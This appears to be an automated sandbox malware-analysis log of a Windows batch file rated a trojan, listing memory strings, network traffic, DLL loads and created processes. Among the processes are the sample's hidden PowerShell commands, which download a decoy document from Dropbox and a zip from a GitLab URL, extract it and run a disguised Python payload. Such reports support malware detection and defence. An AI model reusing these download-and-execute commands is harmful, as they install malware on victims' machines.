              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
              Source: powershell.exe, 0000000C.00000002.2236904626.000001D6B70D2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6B92D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?
              Source: powershell.exe, 0000000C.00000002.2237226709.000001D6B72B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_advertising_campaign_and_collaboration.docx?
              Source: powershell.exe, 0000000C.00000002.2255607311.000001D6D10E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/8wcdoh5jl9xyp5
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.recaptcha.net/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.5:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.5:49749 version: TLS 1.2
              Source: classification engineClassification label: mal100.troj.evad.winBAT@30/16@3/2
              Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\tmpJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2780:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kypzqzbg.5uv.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\13jhsfbose.bat" "
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\chcp.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 13jhsfbose.batVirustotal: Detection: 7%
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\13jhsfbose.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fIndstr /L /I set "C:\Users\user\Desktop\13jhsfbose.bat"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fIndstr /L /I goto "C:\Users\user\Desktop\13jhsfbose.bat"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fIndstr /L /I echo "C:\Users\user\Desktop\13jhsfbose.bat"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fIndstr /L /I pause "C:\Users\user\Desktop\13jhsfbose.bat"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fIndstr /L /I set "C:\Users\user\Desktop\13jhsfbose.bat"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fIndstr /L /I goto "C:\Users\user\Desktop\13jhsfbose.bat"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fIndstr /L /I echo "C:\Users\user\Desktop\13jhsfbose.bat"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fIndstr /L /I pause "C:\Users\user\Desktop\13jhsfbose.bat"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
